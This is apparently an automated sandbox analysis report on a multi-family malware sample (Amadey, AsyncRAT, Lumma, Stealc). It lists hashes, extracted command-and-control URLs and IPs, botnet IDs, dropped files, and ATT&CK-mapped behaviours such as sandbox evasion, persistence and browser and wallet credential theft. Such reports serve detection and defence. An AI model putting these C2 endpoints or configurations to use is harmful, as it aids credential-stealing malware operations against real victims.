amadey | e7b933849e850c1778c1378c7a5d07df318d86f7b3ee6257885b768fa81f685c

Resubmissions

16/03/2025, 14:27

250316-rslvgaszdx 10

16/03/2025, 08:13

250316-j4f5cswsfx 10

15/03/2025, 11:26

250315-njwrjawlt6 10

Analysis

max time kernel
267s
max time network
271s
platform
windows10-ltsc_2021_x64
resource
win10ltsc2021-20250314-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20250314-enlocale:en-usos:windows10-ltsc_2021-x64system
submitted
15/03/2025, 11:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

random.exe
Size

5.6MB
MD5

f0cad0627e4b852e7ce633df29855373
SHA1

3187e3016d889fdcb5f3c38cc19c1dac27163fe4
SHA256

e7b933849e850c1778c1378c7a5d07df318d86f7b3ee6257885b768fa81f685c
SHA512

c121d9a4d2ced148ac422e193096e7596c8270c662065b9f16efe4ec4ccc1552b44ad92511246fdde7fed55fbb53c178a5da28a84533707a907084c25ad9c615
SSDEEP

98304:6zd9u3jgDjebrGE5pd8PY22ImKYMFCqgupRERune9rmqy3kG/TQ8swX+hh/YG6GR:0dMgebrREbJPYIpKcneY13LTQf6+hVYM

Score

10^/10

amadey asyncrat lumma stealc 092155 trump credential_access defense_evasion discovery execution persistence pyinstaller rat spyware stealer trojan upx

Malware Config

Extracted

Family

amadey

Version

5.21

Botnet

092155

http://176.113.115.6

Attributes

install_dir
bb556cff4a
install_file
rapes.exe
strings_key
a131b127e996a898cd19ffb2d92e481b
url_paths
/Ni9kiput/index.php

rc4.plain

Extracted

Family

lumma

https://citydisco.bet/api

https://crosshairc.life/api

https://mrodularmall.top/api

https://jowinjoinery.icu/api

https://legenassedk.top/api

https://4htardwarehu.icu/api

https://cjlaspcorne.icu/api

https://bugildbett.top/api

https://weaponrywo.digital/api

https://zfurrycomp.top/api

https://htardwarehu.icu/api

https://8cjlaspcorne.icu/api

https://adweaponrywo.digital/api

https://begindecafer.world/api

https://9garagedrootz.top/api

https://modelshiverd.icu/api

https://arisechairedd.shop/api

https://catterjur.run/api

https://orangemyther.live/api

https://fostinjec.today/api

Extracted

Family

stealc

Botnet

trump

http://45.93.20.28

Attributes

url_path
/85a1cacf11314eb8.php

Extracted

Family

lumma

https://moderzysics.top/api

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Amadey family
amadey
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat
Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma
Stealc
Stealc is an infostealer written in C++.
stealer stealc
Stealc family
stealc

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral2/files/0x000b0000000281d0-3597.dat	family_asyncrat

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	2x8387.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	B4GPRHU1V3SRRQVV1N6NWVN1DQ16BAO.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	3r19R.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	JqGBbm7.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	v6Oqdnc.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	1u87m9.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
56	5280	powershell.exe

Boot or Logon Autostart Execution: Active Setup 2 TTPs 5 IoCs

Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

persistence

Active Setup

T1547.014

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Software\Microsoft\Active Setup\Installed Components	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Software\Microsoft\Active Setup\Installed Components	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Software\Microsoft\Active Setup\Installed Components	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Software\Microsoft\Active Setup\Installed Components	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Software\Microsoft\Active Setup\Installed Components	explorer.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
25432	Process not Found
34068	Process not Found
5824	powershell.exe
36892	Process not Found
404	powershell.exe
79524	Process not Found
5280	powershell.exe

Downloads MZ/PE file 11 IoCs

flow	pid	Process
52	1156	rapes.exe
54	1156	rapes.exe
60	1156	rapes.exe
63	1156	rapes.exe
63	1156	rapes.exe
63	1156	rapes.exe
56	5280	powershell.exe
16	1156	rapes.exe
16	1156	rapes.exe
16	1156	rapes.exe
12	4208	2x8387.exe

Uses browser remote debugging 2 TTPs 23 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

pid	Process
12696	Process not Found
12960	Process not Found
27208	Process not Found
27896	Process not Found
27888	Process not Found
64064	Process not Found
38248	Process not Found
87312	Process not Found
12608	Process not Found
12600	Process not Found
27264	Process not Found
70448	Process not Found
60444	Process not Found
60292	Process not Found
78368	Process not Found
87196	Process not Found
11988	Process not Found
64200	Process not Found
87552	Process not Found
70848	Process not Found
78340	Process not Found
64216	Process not Found
87188	Process not Found

Checks BIOS information in registry 2 TTPs 18 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	B4GPRHU1V3SRRQVV1N6NWVN1DQ16BAO.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	v6Oqdnc.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	1u87m9.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	v6Oqdnc.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	2x8387.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	3r19R.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	JqGBbm7.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	1u87m9.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	2x8387.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	B4GPRHU1V3SRRQVV1N6NWVN1DQ16BAO.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	3r19R.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	JqGBbm7.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe

Checks computer location settings 2 TTPs 5 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Control Panel\International\Geo\Nation	zY9sqWs.exe
Key value queried	\REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Control Panel\International\Geo\Nation	Gxtuum.exe
Key value queried	\REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Control Panel\International\Geo\Nation	amnew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Control Panel\International\Geo\Nation	1u87m9.exe
Key value queried	\REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Control Panel\International\Geo\Nation	rapes.exe

Executes dropped EXE 23 IoCs

pid	Process
1684	u0k28.exe
5912	1u87m9.exe
1156	rapes.exe
4208	2x8387.exe
4216	B4GPRHU1V3SRRQVV1N6NWVN1DQ16BAO.exe
5552	3r19R.exe
2456	d19abfa281.exe
5024	d19abfa281.exe
4536	rapes.exe
2652	JqGBbm7.exe
3364	zY9sqWs.exe
4384	Gxtuum.exe
3996	Bthvgkck.exe
5660	v6Oqdnc.exe
4388	HmngBpR.exe
2536	SplashWin.exe
6124	SplashWin.exe
1644	ADFoyxP.exe
5920	amnew.exe
3184	futors.exe
4964	rapes.exe
3632	Gxtuum.exe
4020	futors.exe

Identifies Wine through registry keys 2 TTPs 9 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Software\Wine	v6Oqdnc.exe
Key opened	\REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Software\Wine	2x8387.exe
Key opened	\REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Software\Wine	B4GPRHU1V3SRRQVV1N6NWVN1DQ16BAO.exe
Key opened	\REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Software\Wine	JqGBbm7.exe
Key opened	\REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Software\Wine	1u87m9.exe
Key opened	\REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Software\Wine	3r19R.exe
Key opened	\REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Software\Wine	rapes.exe

Loads dropped DLL 8 IoCs

pid	Process
2536	SplashWin.exe
2536	SplashWin.exe
2536	SplashWin.exe
2536	SplashWin.exe
6124	SplashWin.exe
6124	SplashWin.exe
6124	SplashWin.exe
6124	SplashWin.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	random.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	u0k28.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates connected drives 3 TTPs 11 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\F:	explorer.exe
File opened (read-only)	\??\E:	explorer.exe
File opened (read-only)	\??\F:	explorer.exe
File opened (read-only)	\??\E:	explorer.exe
File opened (read-only)	\??\F:	Bthvgkck.exe
File opened (read-only)	\??\E:	explorer.exe
File opened (read-only)	\??\E:	explorer.exe
File opened (read-only)	\??\F:	explorer.exe
File opened (read-only)	\??\F:	explorer.exe
File opened (read-only)	\??\F:	explorer.exe
File opened (read-only)	\??\E:	explorer.exe

Looks up external IP address via web service 6 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
497	checkip.amazonaws.com
500	checkip.amazonaws.com
502	ip-api.com
301	checkip.amazonaws.com
302	checkip.amazonaws.com
310	ip-api.com

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral2/files/0x00080000000282ad-4864.dat	autoit_exe

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
3996	Bthvgkck.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs

pid	Process
5912	1u87m9.exe
1156	rapes.exe
4208	2x8387.exe
4216	B4GPRHU1V3SRRQVV1N6NWVN1DQ16BAO.exe
5552	3r19R.exe
4536	rapes.exe
2652	JqGBbm7.exe
5660	v6Oqdnc.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 2456 set thread context of 5024	2456	d19abfa281.exe	88
PID 2880 set thread context of 4448	2880	sihost.exe	99
PID 6124 set thread context of 4416	6124	SplashWin.exe	103

UPX packed file 57 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/3868-2926-0x00007FFB65B10000-0x00007FFB660F9000-memory.dmp	upx
behavioral2/memory/3868-2927-0x00007FFB6CAB0000-0x00007FFB6CAD3000-memory.dmp	upx
behavioral2/memory/3868-2928-0x00007FFB82D20000-0x00007FFB82D2F000-memory.dmp	upx
behavioral2/memory/3868-2930-0x00007FFB82D10000-0x00007FFB82D1D000-memory.dmp	upx
behavioral2/memory/3868-2929-0x00007FFB793C0000-0x00007FFB793D9000-memory.dmp	upx
behavioral2/memory/3868-2931-0x00007FFB78FD0000-0x00007FFB78FE9000-memory.dmp	upx
behavioral2/memory/3868-2933-0x00007FFB65AA0000-0x00007FFB65AD6000-memory.dmp	upx
behavioral2/memory/3868-2932-0x00007FFB65AE0000-0x00007FFB65B0D000-memory.dmp	upx
behavioral2/memory/3868-2934-0x00007FFB80FF0000-0x00007FFB80FFD000-memory.dmp	upx
behavioral2/memory/3868-2943-0x00007FFB65470000-0x00007FFB6553D000-memory.dmp	upx
behavioral2/memory/3868-2942-0x00007FFB65A60000-0x00007FFB65A93000-memory.dmp	upx
behavioral2/memory/3868-2944-0x00007FFB65540000-0x00007FFB65A60000-memory.dmp	upx
behavioral2/memory/3868-2941-0x00007FFB65B10000-0x00007FFB660F9000-memory.dmp	upx
behavioral2/memory/3868-2946-0x00007FFB7F720000-0x00007FFB7F7EF000-memory.dmp	upx
behavioral2/memory/3868-2945-0x00007FFB6CAB0000-0x00007FFB6CAD3000-memory.dmp	upx
behavioral2/memory/3868-2949-0x00007FFB793C0000-0x00007FFB793D9000-memory.dmp	upx
behavioral2/memory/3868-2948-0x00007FFB877F0000-0x00007FFB87804000-memory.dmp	upx
behavioral2/memory/3868-2947-0x00007FFB82C40000-0x00007FFB82CC7000-memory.dmp	upx
behavioral2/memory/3868-2950-0x00007FFB87820000-0x00007FFB8782B000-memory.dmp	upx
behavioral2/memory/3868-2952-0x00007FFB7F600000-0x00007FFB7F71C000-memory.dmp	upx
behavioral2/memory/3868-2951-0x00007FFB85750000-0x00007FFB85776000-memory.dmp	upx
behavioral2/memory/3868-2954-0x00007FFB85250000-0x00007FFB85262000-memory.dmp	upx
behavioral2/memory/3868-2953-0x00007FFB82460000-0x00007FFB824A3000-memory.dmp	upx
behavioral2/memory/3868-2959-0x00007FFB798B0000-0x00007FFB79AF9000-memory.dmp	upx
behavioral2/memory/3868-2958-0x00007FFB82850000-0x00007FFB82874000-memory.dmp	upx
behavioral2/memory/3868-2957-0x00007FFB65540000-0x00007FFB65A60000-memory.dmp	upx
behavioral2/memory/3868-2956-0x00007FFB65470000-0x00007FFB6553D000-memory.dmp	upx
behavioral2/memory/3868-2955-0x00007FFB65A60000-0x00007FFB65A93000-memory.dmp	upx
behavioral2/memory/3868-2984-0x00007FFB782A0000-0x00007FFB7835C000-memory.dmp	upx
behavioral2/memory/3868-2983-0x00007FFB7B730000-0x00007FFB7B75B000-memory.dmp	upx
behavioral2/memory/3868-2982-0x00007FFB7F530000-0x00007FFB7F55E000-memory.dmp	upx
behavioral2/memory/3868-2981-0x00007FFB7F720000-0x00007FFB7F7EF000-memory.dmp	upx
behavioral2/memory/3868-3018-0x00007FFB65AE0000-0x00007FFB65B0D000-memory.dmp	upx
behavioral2/memory/3868-3028-0x00007FFB85250000-0x00007FFB85262000-memory.dmp	upx
behavioral2/memory/3868-3032-0x00007FFB82850000-0x00007FFB82874000-memory.dmp	upx
behavioral2/memory/3868-3031-0x00007FFB85750000-0x00007FFB85776000-memory.dmp	upx
behavioral2/memory/3868-3030-0x00007FFB82460000-0x00007FFB824A3000-memory.dmp	upx
behavioral2/memory/3868-3029-0x00007FFB65540000-0x00007FFB65A60000-memory.dmp	upx
behavioral2/memory/3868-3027-0x00007FFB87820000-0x00007FFB8782B000-memory.dmp	upx
behavioral2/memory/3868-3045-0x00007FFB7F720000-0x00007FFB7F7EF000-memory.dmp	upx
behavioral2/memory/3868-3044-0x00007FFB7B730000-0x00007FFB7B75B000-memory.dmp	upx
behavioral2/memory/3868-3043-0x00007FFB7F530000-0x00007FFB7F55E000-memory.dmp	upx
behavioral2/memory/3868-3042-0x00007FFB798B0000-0x00007FFB79AF9000-memory.dmp	upx
behavioral2/memory/3868-3026-0x00007FFB877F0000-0x00007FFB87804000-memory.dmp	upx
behavioral2/memory/3868-3025-0x00007FFB82C40000-0x00007FFB82CC7000-memory.dmp	upx
behavioral2/memory/3868-3024-0x00007FFB782A0000-0x00007FFB7835C000-memory.dmp	upx
behavioral2/memory/3868-3023-0x00007FFB65B10000-0x00007FFB660F9000-memory.dmp	upx
behavioral2/memory/3868-3022-0x00007FFB65470000-0x00007FFB6553D000-memory.dmp	upx
behavioral2/memory/3868-3021-0x00007FFB65A60000-0x00007FFB65A93000-memory.dmp	upx
behavioral2/memory/3868-3020-0x00007FFB80FF0000-0x00007FFB80FFD000-memory.dmp	upx
behavioral2/memory/3868-3019-0x00007FFB7F600000-0x00007FFB7F71C000-memory.dmp	upx
behavioral2/memory/3868-3017-0x00007FFB78FD0000-0x00007FFB78FE9000-memory.dmp	upx
behavioral2/memory/3868-3016-0x00007FFB82D10000-0x00007FFB82D1D000-memory.dmp	upx
behavioral2/memory/3868-3015-0x00007FFB793C0000-0x00007FFB793D9000-memory.dmp	upx
behavioral2/memory/3868-3014-0x00007FFB82D20000-0x00007FFB82D2F000-memory.dmp	upx
behavioral2/memory/3868-3013-0x00007FFB6CAB0000-0x00007FFB6CAD3000-memory.dmp	upx
behavioral2/memory/3868-3012-0x00007FFB65AA0000-0x00007FFB65AD6000-memory.dmp	upx

Drops file in Windows directory 3 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\rapes.job	1u87m9.exe
File created	C:\Windows\Tasks\Gxtuum.job	zY9sqWs.exe
File created	C:\Windows\Tasks\futors.job	amnew.exe

Launches sc.exe 6 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
34712	Process not Found
35460	Process not Found
24544	Process not Found
26240	Process not Found
32880	Process not Found
33308	Process not Found

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Detects Pyinstaller 2 IoCs

pyinstaller

resource	yara_rule
behavioral2/files/0x000c000000028171-2809.dat	pyinstaller
behavioral2/files/0x001e000000027eb6-4185.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 5 IoCs

pid	pid_target	Process	procid_target
5976	5020	WerFault.exe	166
62140	64312	Process not Found	7661
77640	64240	Process not Found	7658
86360	74756	Process not Found	8956
86388	74688	Process not Found	8960

System Location Discovery: System Language Discovery 1 TTPs 19 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rapes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2x8387.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	B4GPRHU1V3SRRQVV1N6NWVN1DQ16BAO.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	d19abfa281.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SplashWin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	random.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	JqGBbm7.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	zY9sqWs.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	v6Oqdnc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SplashWin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1u87m9.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	futors.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	u0k28.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	3r19R.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	d19abfa281.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Gxtuum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	amnew.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
64556	Process not Found
65356	Process not Found

Checks SCSI registry key(s) 3 TTPs 64 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Capabilities	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Capabilities	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	explorer.exe
